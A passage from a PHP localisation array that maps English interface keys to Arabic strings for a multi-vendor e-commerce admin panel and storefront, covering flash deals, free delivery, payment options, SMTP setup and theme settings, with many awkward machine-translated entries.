'featured_status_updated_successfully' => 'تم تحديث الحالة المميزة بنجاح', 'features_Section' => 'قسم الميزات', 'feel_free_to_email_us' => 'لا تتردد في مراسلتنا عبر البريد الإلكتروني', 'few_steps_ahead' => 'خطوات قليلة إلى الأمام', 'field_name' => 'اسم الحقل', 'file' => 'ملف', 'file_delete_successfully' => 'ملف حذف بنجاح', 'file_manager' => 'مدير الملفات', 'file_not_found' => 'لم يتم العثور على الملف', 'file_path_copied_successfully!' => 'تم نسخ مسار الملف بنجاح!', 'file_size_too_big' => 'حجم الملف كبير جدا', 'file_type' => 'نوع الملف', 'file_upload_successfully!' => 'تحميل الملف بنجاح!', 'fill_in_your_email_address_below.' => 'ملء في عنوان البريد الالكتروني أدناه.', 'fill_the_form_and_press' => 'املأ النموذج واضغط', 'filter' => 'منقي', 'filter Data' => 'تصفية البيانات', 'filter_Data' => 'تصفية البيانات', 'filter_by' => 'مصنف بواسطة', 'filter_data' => 'تصفية البيانات', 'filter_options' => 'خيارات التصفية', 'filter_order' => 'ترتيب مرشح', 'find_SMTP_server_details' => 'ابحث عن تفاصيل خادم SMTP', 'find_and_select_products_to_see_the_differences_and_similarities_between_them' => 'ابحث عن المنتجات وتحديدها لمعرفة الاختلافات والتشابه بينهما', 'find_us' => 'تجدنا', 'find_your_best_featured_product' => 'ابحث عن أفضل منتج مميز لك', 'find_your_best_signature_product' => 'ابحث عن أفضل منتج توقيعك', 'first' => 'أولاً', 'first order' => 'الطلب الأول', 'first_Name' => 'الاسم الأول', 'first_Order' => 'الطلب الأول', 'first_name' => 'الاسم الأول', 'first_name_is_required' => 'الإسم الأول مطلوب', 'first_step' => 'الخطوة الأولى', 'fixed' => 'مُثَبَّت', 'fixed_amount' => 'مبلغ ثابت', 'flash deal' => 'صفقة فلاش', 'flash deal products' => 'Flash Deal Products', 'flash deals' => 'عروض فلاش', 'flash_Deal' => 'صفقة فلاش', 'flash_Deal_Products' => 'Flash Deal Products', 'flash_Deals' => 'عروض فلاش', 'flash_deal' => 'صفقة فلاش', 'flash_deal_b' => 'صفقة فلاش ب', 'flash_deal_table' => 'طاولة صفقة فلاش', 'flash_deals' => 'عروض فلاش', 'flash_deals_update' => 'تحديث صفقات الفلاش', 'flat' => 'مستوي', 'flutterwave' => 'Flutterwave', 'follow' => 'يتبع', 'follow_steps' => 'اتبع الخطوات', 'followers' => 'متابعون', 'footer_Banner' => 'لافتة تذييل', 'for' => 'ل', 'for_android' => 'لأجهزة الأندرويد', 'for_app' => 'للتطبيق', 'for_data_entry' => 'لإدخال البيانات', 'for_inhouse_deliver' => 'لتسليم Inhouse', 'for_ios' => 'لنظام التشغيل iOS', 'for_website' => 'لموقع الويب', 'for_you' => 'لك', 'for_âReady_Productâ_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products._For_âReady_After_Saleâ_deliveries _customers_pay_first _then_admin_uploads_the_digital_products_that_become_available_to_customers_for_download' => 'بالنسبة إلى  Ready Producties ، يمكن للعملاء دفع وتنزيل المنتجات الرقمية التي تم تحميلها على الفور. من أجل  جاهز بعد عمليات التسليم ، يدفع العملاء أولاً ، ثم يقوم المسؤول بتحميل المنتجات الرقمية التي تصبح متاحة للعملاء للتنزيل', 'for_âReady_Productâ_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products_by_admin._For_âReady_After_Saleâ_deliveries _customers_pay_first _then_admin_uploads_the_digital_products_that_become_available_to_customers_for_download' => 'من أجل  Ready Producties يمكن للعملاء دفع وتنزيل المنتجات الرقمية المُحسّنة على الفور بواسطة Admin. من أجل  جاهز بعد عمليات التسليم ، يدفع العملاء أولاً ، ثم يقوم المسؤول بتحميل المنتجات الرقمية التي تصبح متاحة للعملاء للتنزيل', 'for_âReady_Productâ_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products_by_seller._For_âReady_After_Saleâ_deliveries _customers_pay_first _then_seller_uploads_the_digital_products_that_become_available_to_customers_for_download' => 'بالنسبة إلى  Ready Producties ، يمكن للعملاء دفع وتنزيل المنتجات الرقمية التي تم تحميلها على الفور بواسطة البائع. من أجل  جاهز بعد عمليات التسليم ، يدفع العملاء أولاً ثم يقوم البائع بتحميل المنتجات الرقمية التي تصبح متاحة للعملاء للتنزيل', 'forgot_Password' => 'هل نسيت كلمة السر', 'forgot_password' => 'هل نسيت كلمة السر', 'forgot_password ' => 'هل نسيت كلمة السر', 'forgot_password_verification_by' => 'نسيت التحقق من كلمة المرور بواسطة', 'forgot_your_password' => 'نسيت كلمة السر', 'form' => 'استمارة', 'form & press' => 'شكل وضغط', 'format_within' => 'تنسيق داخل', 'fourth_step' => 'الخطوة الرابعة', 'free' => 'حر', 'free delivery' => 'توصيل مجاني', 'free_Delivery' => 'توصيل مجاني', 'free_Delivery_Amount' => 'مبلغ التوصيل المجاني', 'free_Delivery_Coupon' => 'قسيمة توصيل مجانية', 'free_Delivery_Over' => 'توصيل مجاني', 'free_Delivery_Over_Amount' => 'توصيل مجاني على المبلغ', 'free_Delivery_Responsibility' => 'مسؤولية التوصيل المجاني', 'free_Shipping_Over_Order_Amount_Discount' => 'شحن مجاني على خصم مبلغ الطلب', 'free_delivery' => 'توصيل مجاني', 'free_delivery_amount' => 'مبلغ التوصيل المجاني', 'free_delivery_coupon' => 'قسيمة توصيل مجانية', 'free_delivery_on_coupon_discount' => 'توصيل مجاني على خصم القسيمة', 'free_delivery_over_amount' => 'توصيل مجاني على المبلغ', 'free_delivery_over_amount_for_every_seller_if_they_do_not_set_any_range_yet' => 'توصيل مجاني أكثر من المبلغ لكل بائع إذا لم يحدد أي نطاق حتى الآن', 'frequently_asked_question' => 'أسئلة شائعة', 'from' => 'من', 'from Navbar' => 'من Navbar', 'from admin' => 'من المشرف', 'from below and click' => 'من الأسفل وانقر', 'from left sidebar' => 'من الشريط الجانبي الأيسر', 'from_Navbar' => 'من Navbar', 'from_Register_tab_press' => 'من علامة التبويب التسجيل اضغط', 'from_below_and_click' => 'من الأسفل وانقر', 'from_date' => 'من التاريخ', 'from_left_sidebar' => 'من الشريط الجانبي الأيسر', 'full_name' => 'الاسم الكامل', 'fund_add_by_admin+message' => 'صندوق إضافة بواسطة المسؤول+رسالة', 'fund_added_successfully' => 'أضاف الصندوق بنجاح', 'fwrf' => 'شرب حتى الثمالة', 'gallery' => 'صالة عرض', 'gateway' => 'بوابة', 'general' => 'عام', 'general_Info' => 'معلومات عامة', 'general_Information' => 'معلومات عامة', 'general_info' => 'معلومات عامة', 'general_information' => 'معلومات عامة', 'general_settings' => 'الاعدادات العامة', 'general_setup' => 'الإعداد العام', 'generate' => 'يولد', 'generate_Code' => 'إنشاء التعليمات البرمجية', 'generate_barcode' => 'توليد الباركود', 'generate_code' => 'إنشاء التعليمات البرمجية', 'generate_invoice' => 'توليد فاتورة', 'generate_sitemap' => 'توليد خريطة sitemap', 'genuine' => 'أصيل', 'genuine_product' => 'منتج أصلي', 'get_In' => 'أدخل', 'get_in' => 'أدخل', 'get_new_password' => 'احصل على كلمة سر جديدة', 'get_started' => 'البدء', 'get_your_zip_file_from_the_purchased_addons_and_upload_it_and_activate_theme_with_your_Codecanyon_username_and_purchase_code' => 'احصل على ملف zip الخاص بك من الإضافات التي تم شراؤ', 'get_your_zip_file_from_the_purchased_theme_and_upload_it_and_activate_theme_with_your_Codecanyon_username_and_purchase_code' => 'احصل على ملف zip الخاص بك من السمة التي تم شراؤها وقم بتحميله وتفعيل السمة باستخدام اسم مستخدم Codecanyon ورمز الشراء الخاص بك', 'go_to' => 'اذهب إلى', 'go_to_Vacation_Mode' => 'انتقل إلى وضع الإجازة', 'go_to_apple_developer_page' => 'انتقل إلى صفحة مطور Apple', 'go_to_chatbox' => 'انتقل إلى مربع الدردشة', 'go_to_checkout' => 'انتقل إلى الخروج', 'go_to_shopping' => 'الذهاب للتسوق', 'go_to_the_SMTP_mail_setup_page_in_the_admin_panel' => 'انتقل إلى صفحة إعداد بريد SMTP في لوحة المسؤول', 'go_to_the_facebook_developer_page' => 'انتقل إلى صفحة مطور Facebook', 'go_to_vacation_mode' => 'انتقل إلى وضع الإجازة', 'gogoi' => 'Gogoi', 'good' => 'جيد', 'google' => 'جوجل', 'google_API_Set_up_Instructions' => 'جوجل API إعداد التعليمات', 'google_credentials_updated' => 'تم تحديث بيانات اعتماد Google', 'google_map_API_setup' => 'إعداد API MAP Google', 'google_play_store' => 'متجر جوجل بلاى', 'google_plus' => 'جوجل بلس', 'google_tag_manager_id' => 'معرف مدير علامة Google', 'google_tag_manager_script_id_from_google' => 'معرف البرنامج النصي لـ Google Tag Manager من Google', 'got_it' => 'فهمتها', 'guest_checkout' => 'ضيف المحاسبة', 'guest_customer' => 'عميل ضيف', 'halar' => 'يحضر', 'has_been_sent_to_' => 'تم إرسالها إلى', 'hash' => 'التجزئة', 'have_an_account' => 'لديك حساب', 'have_to_upload_zip_file' => 'يجب تحميل ملف zip', 'header_Banner' => 'لافتة الرأس', 'hello' => 'مرحبًا', 'help topics' => 'مساعدة المواضيع', 'help_&_support' => 'ساعد لدعم', 'help_&_support_section' => 'قسم المساعدة والدعم', 'help_topic' => 'موضوع المساعدة', 'here' => 'هنا', 'here_in_top__left_corner_you_can_see_the' => 'هنا في أعلى الزاوية اليسرى يمكنك رؤية', 'hi' => 'أهلاً', 'high' => 'عالي', 'high_low' => 'عالي منخفض', 'high_to_low_price' => 'ارتفاع السعر إلى انخفاض', 'highest_Products' => 'أعلى المنتجات', 'hight_low' => 'عالي منخفض', 'hold' => 'يمسك', 'holder_Name' => 'اسم حامل', 'holder_name' => 'اسم حامل', 'home' => 'بيت', 'home_category_status' => 'حالة فئة المنزل', 'home_status' => 'حالة المنزل', 'host' => 'يستضيف', 'hotline' => 'الخط الساخن', 'hours' => 'ساعات', 'how_it_works' => 'كيف تعمل', 'how_much_point' => 'كم نقطة', 'how_to_use' => 'كيف تستعمل', 'how_you_it_works' => 'كيف تعمل', 'hrs' => 'ساعات', 'i_Accept' => 'أنا أتفق', 'i_agree_to_Your' => 'أنا أوافق على الخاص بك', 'i_agree_to_Your_terms' => 'أوافق على شروطك', 'i_agree_with_the' => 'أتفق مع', 'icon' => 'أيقونة', 'icon_box' => 'صندوق الرمز', 'id' => 'بطاقة تعريف', 'identification_number' => 'رقم الهوية', 'identity' => 'هوية', 'identity_Number' => 'رقم الهوية', 'identity_Type' => 'نوع الهوية', 'identity_image' => 'صورة الهوية', 'if the shipping responsibility is inhouse and product wise shipping is activated then this function will work' => 'إذا كانت مسؤولية الشحن غير مستمدة وتم تنشيط الشحن الحكيمة للمنتج ، فستعمل هذه الوظيفة', 'if_Customer_Referral_Earning_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'إذا تم تعطيل كسب إحالة العملاء قبل كل إعدادات هذا القسم لن تكون متاحة', 'if_GST_number_is_disabled_here_it_will_not_show_in_invoice' => 'إذا تم تعطيل رقم ضريبة السلع والخدمات هنا ، فلن يظهر في الفاتورة', 'if_disabled _this_SMS_service_will_be_hidden_from_the_system ' => 'إذا تم تعطيل خدمة الرسائل القصيرة هذه سيتم إخفاءها من النظام', 'if_disabled_Admin_needs_to_return_the_refund_amount_manually' => 'إذا احتاج المسؤول المعاق إلى إعادة مبلغ الاسترداد يدويًا', 'if_disabled_Digital_Payment_options_will_be_hidden_from_the_checkout_page' => 'إذا تم إخفاء خيارات الدفع الرقمية المعوقة من صفحة الخروج', 'if_disabled_POS_option_will_be_hidden_from_the_Seller_Panel' => 'إذا تم إخفاء خيار POS المعاق من لوحة البائع', 'if_disabled_Sellers_can_not_register_themselves_from_website_or_App' => 'إذا لم يتمكن البائعون المعاقون من تسجيل أنفسهم من موقع الويب أو التطبيق', 'if_disabled_all_your_apps_and_customer_website_will_be_functional' => 'إذا تم تعطيل جميع التطبيقات الخاصة بك وموقع العميل ستكون وظيفية', 'if_disabled_brand_section_will_be_hidden_from_the_customer_app_and_website' => 'إذا تم إخفاء قسم العلامة التجارية المعوقة من تطبيق العميل وموقع الويب', 'if_disabled_customer_wallet_option_will_be_hidden_from_their_account' => 'إذا تم إخفاء خيار محفظة العميل المعوقة من حسابهم', 'if_disabled_customers_can_only_pay_through_the_system_supported_payment_methods' => 'إذا كان بإمكان العملاء المعوقين الدفع فقط من خلال طرق الدفع المدعومة من النظام', 'if_disabled_customers_have_to_use_the_system-added_payment_gateways' => 'إذا كان على العملاء المعوقين استخدام بوابات الدفع المضافة للنظام', 'if_disabled_customers_will_not_receive_rewards_for_successful_referral' => 'إذا لم يتلق العملاء المعاقون مكافآت للإحالة الناجحة', 'if_disabled_customers_would_not_be_able_to_add_money_to_their_wallet' => 'إذا لم يتمكن العملاء المعاقون من إضافة أموال إلى محفظتهم', 'if_disabled_deliverymen_do_not_need_to_verify_the_order_deliveries' => 'إذا كان رجال التوصيل المعاقين لا يحتاجون إلى التحقق من توصيل الطلبات', 'if_disabled_loyalty_point_option_will_be_hidden_from_the_customers_account' => 'إذا تم إخفاء خيار نقطة الولاء المعوقة من حساب العملاء', 'if_disabled_sellers_can_not_sell_digital_products_in_their_shops' => 'إذا لم يتمكن البائعون المعاقون من بيع المنتجات الرقمية في متاجرهم', 'if_disabled_sellers_cannot_set_the_minimum_order_amount_for_their_store_and_the_admin_will_set_it' => 'إذا لم يتمكن البائعون المعاقون', 'if_disabled_system_cannot_use_this_SMS_Gateway' => 'إذا لم يتمكن النظام المعاق عن استخدام بوابة الرسائل القصيرة هذه', 'if_disabled_the Cash_on_Delivery_payment_method_will_be_hidden_from_the_checkout_page' => 'إذا تم تعطيلها ، فسيتم إخفاء طريقة دفع النقد عند التسليم من صفحة الخروج', 'if_disabled_the_App_Store_button_will_be_hidden_from_the_website_footer' => 'إذا تم تعطيل زر App Store سيتم إخفاءه من تذييل موقع الويب', 'if_disabled_the_Google_Play_Store_button_will_be_hidden_from_the_website_footer' => 'إذا تم تعطيل زر متجر Google Play سيتم إخفاءه من تذييل موقع الويب', 'if_disabled_the_billing_address_will_be_hidden_from_the_checkout_page' => 'إذا تم تعطيل ، فسيتم إخفاء عنوان الفواتير من صفحة الخروج', 'if_disabled_the_free_delivery_feature_will_be_hidden_from_the_system' => 'إذا تم تعطيل ميزة التوصيل المجاني سيتم إخفاءها من النظام', 'if_disabled_there_will_be_no_delivery_restrictions_based_on_zip_code_areas' => 'إذا تم تعطيله ، فلن تكون هناك قيود على التسليم على أساس مناطق الرمز البريدي', 'if_disabled_there_will_be_no_minimum_order_restrictions_and_customers_can_place_any_order_amount' => 'إذا تم تعطيله ، فلن يكون هناك الحد الأدنى لقيود الطلبات ويمكن للعملاء وضع أي مبلغ طلب', 'if_disabled_this_banner_will_be_hidden_from_the_website_and_customer_app' => 'إذا تم تعطيل ، فسيتم إخفاء هذه اللافتة عن موقع الويب وتطبيق العميل', 'if_disabled_this_coupon_will_be_hidden_from_the_website_and_customer_app' => 'إذا تم تعطيل هذه القسيمة ، فسيتم إخفاء هذه القسيمة من موقع الويب وتطبيق العميل', 'if_disabled_this_feature_will_be_hidden_from_the_system' => 'إذا تم تعطيلها ، فسيتم إخفاء هذه الميزة عن النظام', 'if_disabled_this_language_will_be_hidden_from_the_entire_system' => 'إذا تم تعطيل هذه اللغة ، فسيتم إخفاء هذه اللغة عن النظام بأكمله', 'if_disabled_this_language_will_be_unset_as_default_for_the_entire_system' => 'إذا تم تعطيل هذه اللغة ، فستكون هذه اللغة افتراضيًا للنظام بأكمله', 'if_disabled_this_payment_method_will_be_hidden_from_the_checkout_page' => 'إذا تم تعطيل طريقة الدفع هذه ، فسيتم إخفاءها من صفحة الخروج', 'if_disabled_this_product_will_be_hidden_from_the_website_and_customer_app' => 'إذا تم تعطيله ، فسيتم إخفاء هذا المنتج من موقع الويب وتطبيق العميل', 'if_disabled_this_product_will_be_removed_from_the_featured_product_section_of_the_website_and_customer_app' => 'إذا تم تعطيل هذا المنتج ، فسيتم إزالة هذا المنتج من قسم المنتج المميز في موقع الويب وتطبيق العميل', 'if_disabled_this_support_ticket_will_be_inactive' => 'إذا تم تعطيل تذكرة الدعم هذه ، فستكون غير نشطة', 'if_disabled_users_must_log_in_to_the_system_to_complete_the_checkout_process' => 'إذا كان على المستخدمين المعوقين تسجيل الدخول إلى النظام لإكمال عملية الخروج', 'if_disabled_users_would_not_receive_verification_codes_on_their_registered_email_addresses' => 'إذا لم يتلق المستخدمون المعاقون رموز التحقق على عناوين البريد الإلكتروني المسجلة الخاصة بهم', 'if_disabled_users_would_not_receive_verification_codes_on_their_registered_phone_numbers' => 'إذا لم يتلق المستخدمون المعاقون رموز التحقق على أرقام هواتفهم المسجلة', 'if_enabled _customers_can_choose_digital_payment_options_during_the_checkout_process' => 'إذا كان بإمكان العملاء التمكين اختيار خيارات الدفع الرقمية أثناء عملية الخروج', 'if_enabled _the_cash_on_delivery_option_will_be_available_on_the_system._Customers_can_use_COD_as_a_payment_option' => 'إذا تم التمكين ، فسيتوفر خيار النقد عند التسليم على النظام. يمكن للعملاء استخدام COD كخيار للدفع', 'if_enabled _the_shipping_charge_will_increase_with_the_product_quantity' => 'إذا تم التمكين ، فسيزيد شحن الشحن مع كمية المنتج', 'if_enabled _this_SMS_service_will_be_available_in_the_system' => 'إذا تم تمكين خدمة الرسائل القصيرة هذه ستكون متاحة في النظام', 'if_enabled_Admin_can_return_the_refund_amount_directly_to_the_customers_wallet_' => 'إذا تمكن المسؤول الممكّن من إعادة مبلغ الاسترداد مباشرة إلى محفظة العملاء', 'if_enabled_POS_option_will_be_available_in_the_Seller_Panel' => 'إذا كان خيار POS الذي تم تمكينه سيكون متاحًا في لوحة البائع', 'if_enabled_POS_will_be_available_on_the_Seller_Panel' => 'إذا كان POS ممكّن سيكون متاحًا على لوحة البائع', 'if_enabled_admin_can_deliver_orders_outside_his_country' => 'إذا تمكن المشرف الممكّن من تقديم أوامر خارج بلاده', 'if_enabled_admin_can_temporarily_pause_his_shop_activities' => 'إذا كان بإمكان المسؤول الممكّن إيقاف أنشطة متجره مؤقتًا', 'if_enabled_all_your_apps_and_customer_website_will_be_temporarily_off' => 'إذا تم تمكين جميع تطبيقاتك وموقع العميل ، فسيتم إيقاف تشغيله مؤقتًا', 'if_enabled_customers_can_add_money_to_their_wallet' => 'إذا كان بإمكان العملاء تمكين إضافة أموال إلى محفظتهم', 'if_enabled_customers_can_have_the_wallet_option_on_their_account_and_use_it_while_placing_orders_and_getting_refunds' => 'إذا كان بإمكان العملاء تمكين الحصول على خيار المحفظة على حسابهم واستخدامه أثناء تقديم الطلبات والحصول على المبالغ المستردة', 'if_enabled_customers_can_pay_through_different_payment_methods_outside_your_system' => 'إذا كان بإمكان العملاء التمكين الدفع من خلال طرق دفع مختلفة خارج نظامك', 'if_enabled_customers_can_pay_through_external_payment_methods' => 'إذا كان بإمكان العملاء التمكين الدفع من خلال طرق الدفع الخارجية', 'if_enabled_customers_can_see_brands_on_the_app_and_website' => 'إذا تمكن العملاء من رؤية العلامات التجارية على التطبيق وموقع الويب', 'if_enabled_customers_can_select_Cash_on_Delivery_as_a_payment_method_during_checkout' => 'إذا كان بإمكان العملاء التمكين تحديد النقد عند التسليم كوسيلة دفع أثناء الخروج', 'if_enabled_customers_can_select_Digital_Payment_during_checkout' => 'إذا كان بإمكان العملاء التمكين تحديد الدفع الرقمي أثناء الخروج', 'if_enabled_customers_can_use_this_payment_method' => 'إذا كان بإمكان العملاء التمكين استخدام طريقة الدفع هذه', 'if_enabled_customers_must_order_over_the_minimum_amount_of_orders_that_admin_or_sellers_set' => 'إذا كان يجب على العملاء تمكين الطلب على الحد الأدنى من الطلبات التي تم تعيينها المسؤول أو البائعين', 'if_enabled_customers_must_place_at_least_or_more_than_the_order_amount_that_admin_or_sellers_set' => 'إذا كان يجب على العملاء تمكين وضع ما لا يقل عن أو أكثر من مبلغ الطلب الذي تم تعيينه المسؤول أو البائعين', 'if_enabled_customers_will_receive_rewards_for_each_successful_referral' => 'إذا كان العملاء الممكّنون سيتلقون مكافآت لكل إحالة ناجحة', 'if_enabled_deliveries_will_be_available_only_in_the_added_zip_code_areas' => 'إذا كانت عمليات التسليم الممكّنة متوفرة فقط في مناطق الرمز البريدي المضافة', 'if_enabled_deliverymen_can_not_upload_picture_at_the_order_deliveries_time' => 'إذا لم يتمكن رجال التسليم الممكّن من تحميل الصورة في وقت التسليم', 'if_enabled_deliverymen_can_upload_picture_at_the_order_deliveries_time' => 'إذا كان بإمكان رجال التسليم الممكّن تحميل الصورة في وقت تسليم الطلب', 'if_enabled_deliverymen_must_verify_the_order_deliveries_by_collecting_the_OTP_from_customers' => 'إذا كان على التسليم الممكّن التحقق من توصيل الطلبات عن طريق جمع OTP من العملاء', 'if_enabled_everyone_can_see_the_App_Store_button_in_the_website_footer' => 'إذا تم تمكين الجميع ، يمكن للجميع رؤية زر متجر التطبيقات في تذييل موقع الويب', 'if_enabled_everyone_can_see_the_Google_Play_Store_button_in_the_website_footer' => 'إذا تم تمكين الجميع ، يمكن للجميع رؤية زر متجر Google Play في تذييل موقع الويب', 'if_enabled_free_delivery_will_be_available_when_customers_order_over_a_certain_amount' => 'إذا كان التسليم المجاني ممكّنًا سيكون متاحًا عندما يطلب العملاء أكثر من مبلغ معين', 'if_enabled_sellers_can_register_by_themselves_from_website_or_app' => 'إذا تمكن البائعون الممكّنون من التسجيل بأنفسهم من موقع الويب أو التطبيق', 'if_enabled_sellers_can_sell_digital_products' => 'إذا كان بإمكان البائعين الذين تم تمكينهم بيع المنتجات الرقمية', 'if_enabled_sellers_can_sell_digital_products_in_their_shops' => 'إذا تمكن البائعون الممكّنون من بيع المنتجات الرقمية في متاجرهم', 'if_enabled_sellers_can_send_registration_requests_to_admin' => 'إذا كان بإمكان البائعين الذين تم تمكينهم إرسال طلبات التسجيل إلى المسؤول', 'if_enabled_sellers_can_set_minimum_order_amount_for_their_stores_by_themselves' => 'إذا تمكنت البائعون الممكّنون من تعيين مبلغ الحد الأدنى لمتاجرهم بمفردهم', 'if_enabled_system_can_use_this_SMS_Gateway' => 'إذا كان بإمكان نظام التمكين استخدام بوابة الرسائل القصيرة هذه', 'if_enabled_the_Google_Play_Store_will_be_visible_in_the_website_footer_section' => 'إذا تم تمكين متجر Google Play سيكون مرئيًا في قسم تذييل موقع الويب', 'if_enabled_the_billing_address_will_be_shown_on_the_checkout_page' => 'إذا تم التمكين ، فسيتم عرض عنوان الفواتير على صفحة الخروج', 'if_enabled_the_download_button_from_the_App_Store_will_be_visible_in_the_Footer_section' => 'إذا تم التمكين ، فسيكون زر التنزيل من متجر التطبيقات مرئيًا في قسم التذييل', 'if_enabled_the_free_delivery_feature_will_be_shown_from_the_system' => 'إذا تم تمكين ، فسيتم عرض ميزة التوصيل المجاني من النظام', 'if_enabled_the_loyalty_point_option_will_be_available_to_the_customers_account' => 'إذا تم تمكين ، فسيتوفر خيار نقطة الولاء لحساب العملاء', 'if_enabled_this_banner_will_be_available_on_the_website_and_customer_app' => 'إذا تم تمكين هذه اللافتة ، فستكون هذه اللافتة متاحة على موقع الويب وتطبيق العميل', 'if_enabled_this_coupon_will_be_available_on_the_website_and_customer_app' => 'إذا تم تمكين هذه القسيمة ، فستكون هذه القسيمة متاحة على موقع الويب وتطبيق العميل', 'if_enabled_this_language_will_be_available_throughout_the_entire_system' => 'إذا تم تمكين هذه اللغة ستكون متاحة في جميع أنحاء النظام بأكمله', 'if_enabled_this_language_will_be_set_as_default_for_the_entire_system' => 'إذا تم تمكين هذه اللغة ، فسيتم تعيينها على أنها افتراضية للنظام بأكمله', 'if_enabled_this_product_will_be_available_on_the_website_and_customer_app' => 'إذا تم تمكين هذا المنتج سيكون متاحًا على موقع الويب وتطبيق العميل', 'if_enabled_this_product_will_be_shown_in_the_featured_product_on_the_website_and_customer_app' => 'إذا تم تمكين هذا المنتج في المنتج المميز على موقع الويب وتطبيق العميل', 'if_enabled_this_support_ticket_will_be_active' => 'إذا تم تمكين تذكرة الدعم هذه ، فستكون نشطة', 'if_enabled_users_can_complete_the_checkout_process_without_logging_in_to_the_system' => 'إذا تمكن المستخدمون من إكمال عملية الخروج دون تسجيل الدخول إلى النظام', 'if_enabled_users_can_receive_verification_codes_on_their_registered_email_addresses' => 'إذا كان بإمكان المستخدمين التمكين تلقي رموز التحقق على عناوين البريد الإلكتروني المسجلة الخاصة بهم', 'if_enabled_users_can_receive_verification_codes_via_OTP_messages_on_their_registered_phone_numbers' => 'إذا كان بإمكان المستخدمين تمكين تلقي رموز التحقق عبر رسائل OTP على أرقام هواتفهم المسجلة', 'if_enabled_users_will_receive_verification_codes_on_their_registered_email_addresses' => 'إذا كان المستخدمون سيتلقون رموز التحقق على عناوين البريد الإلكتروني المسجلة', 'if_enabled_users_will_receive_verification_codes_on_their_registered_phone_numbers' => 'إذا كان المستخدمون سيتلقون رموز التحقق على أرقام هواتفهم المسجلة', 'if_needed' => 'إذا لزم الأمر', 'if_not _double-check_your_SMTP_settings_and_try_again' => 'إذا لم تكن تحقق من إعدادات SMTP الخاصة بك وحاول مرة أخرى', 'if_required' => 'إذا لزم الأمر', 'if_sales_commission_is_disabled_here_the_system_default_commission_will_be_applied' => 'إذا تم تعطيل لجنة المبيعات هنا ، فسيتم تطبيق اللجنة الافتراضية للنظام', 'if_successful _you_will_see_a_confirmation_message_indicating_that_the_connection_is_working_fine' => 'إذا نجحت ، فسترى رسالة تأكيد تشير إلى أن الاتصال يعمل بشكل جيد', 'if_the_Customer_Loyalty_Point_option_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'إذا تم تعطيل خيار نقطة ولاء العميل قبل كل إعدادات هذا القسم لن تكون متاحة', 'if_the_Customer_Wallet_option_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'إذا تم تعطيل خيار محفظة العميل فوق كل إعدادات هذا القسم لن تكون متاحة', 'if_the_SMTP_connection_test_is_successful _you_can_now_enable_the_mail_configuration_services_by_toggling_the_switch_to_ ON ' => 'إذا نجح اختبار اتصال SMTP ، فيمكنك الآن تمكين خدمات تكوين البريد عن طريق تبديل التبديل إلى ON', 'if_the_shipping_responsibility_is_inhouse_and_product_wise_shipping_is_activated_then_this_function_will_work' => 'إذا كانت مسؤولية الشحن inhouse وتم تنشيط الشحن الحكيمة للمنتج ، فستعمل هذه الوظيفة', 'if_thermal_printer_is_ready' => 'إذا كانت الطابعة الحرارية جاهزة', 'if_you_change_addon_status' => 'إذا قمت بتغيير حالة Addon', 'if_you_change_from_on_theme_to_another_there_are_certain_changes_that_you_need_to_maintain_and_setup_data.' => 'إذا تغيرت من على الموضوع إلى آخر ، فهناك بعض التغييرات التي تحتاجها للحفاظ على البيانات وإعدادها.', 'if_you_change_theme_from_theme_setup_these_banners_will_not_be_shown_in_changed_theme._You_have_upload_all_the_banners_over_again _according_to_the_new_theme_ratio_and_sizes._If_you_switch_back_to_' => 'إذا قمت بتغيير السمة من إعداد السمة ، فلن يتم عرض هذه اللافتات في الموضوع الذي تم تغييره. لقد قمت بتحميل جميع اللافتات مرة أخرى وفقًا لنسبة السمة الجديدة وأحجامها. إذا قمت بإعادة العودة إلى', 'if_you_need_help' => 'إذا كنت بحاجة إلى مساعدة', 'if_you_require_any_assistance_or_have_feedback_or_suggestions_about_our_site_you_can_email_us_at' => 'إذا كنت بحاجة إلى أي مساعدة أو لديك ملاحظات أو اقتراحات حول موقعنا ، يمكنك مراسلتي عبر البريد الإلكتروني', 'if_you_shift_in_another_theme' => 'إذا تحولت في موضوع آخر', 'if_you_want_to_add_fund_to_your_wallet_then_click_add_fund_button' => 'إذا كنت ترغب في إضافة صندوق إلى محفظتك ، فانقر فوق زر إضافة صندوق الصندوق', 'if_you`re_not_sure_where_to_find_these_details _check_the_email_provider`s_documentation_or_support_resources_for_guidance' => 'إذا لم تكن متأكدًا من مكان العثور على هذه التفاصيل ، تحقق من موارد مزود البريد الإلكتروني أو موارد الدعم للتوجيه', 'if_you`re_unsure_about_the_SMTP_settings _contact_your_email_service_provider_or_IT_administrator_for_assistance' => 'إذا لم تكن متأكدًا من إعدادات SMTP ، فاتصل بمزود خدمة البريد الإلكتروني الخاص بك أو مسؤول تكنولوجيا المعلومات للحصول على المساعدة', 'if_âFlatâ _discount_amount_will_be_set_as_fixed_amount._If_âPercentageâ _discount_amount_will_be_set_as_percentage.' => 'إذا تم تعيين مبلغ الخصم المسطح كمبلغ ثابت. إذا تم تحديد مبلغ الخصم المئوي كنسبة مئوية.', 'iframe_id' => 'معرف iframe', 'im_not_a_robot_checkbox' => 'أنا لست مربع اختيار روبوت', 'im_not_a_robot_checkbox ' => 'أنا لست مربع اختيار روبوت', 'image' => 'صورة', 'image_Upload' => 'تحميل الصورة', 'image_format' => 'شكل صورة', 'image_ratio' => 'نسبة الصورة', 'image_ratio_should_be' => 'يجب أن تكون نسبة الصورة', 'image_ration' => 'حصص الصورة', 'image_size' => 'حجم الصورة', 'image_size_must_be_within' => 'يجب أن يكون حجم الصورة داخل', 'image_type_must_be_within' => 'يجب أن يكون نوع الصورة داخل', 'images' => 'الصور', 'important' => 'مهم', 'in' => 'في', 'in-Hous_Products' => 'منتجات في البيت', 'in-House' => 'في بيت', 'in-House_Earning' => 'كسب في المنزل', 'in-House_Shop' => 'متجر في المنزل', 'in-Stock' => 'في الأوراق المالية', 'in-house' => 'في بيت', 'in-house_Products' => 'المنتجات الداخلية', 'in-house_earning' => 'كسب في المنزل', 'in_House' => 'في بيت', 'in_House Orders' => 'في أوامر المنزل', 'in_House Products' => 'في المنتجات المنزلية', 'in_House_Order' => 'في ترتيب المنزل', 'in_House_Product_List' => 'في قائمة المنتجات المنزلية', 'in_House_earning' => 'في كسب المنزل', 'in_Stock' => 'في الأوراق المالية', 'in_about_section_select' => 'في القسم حول SELECT', 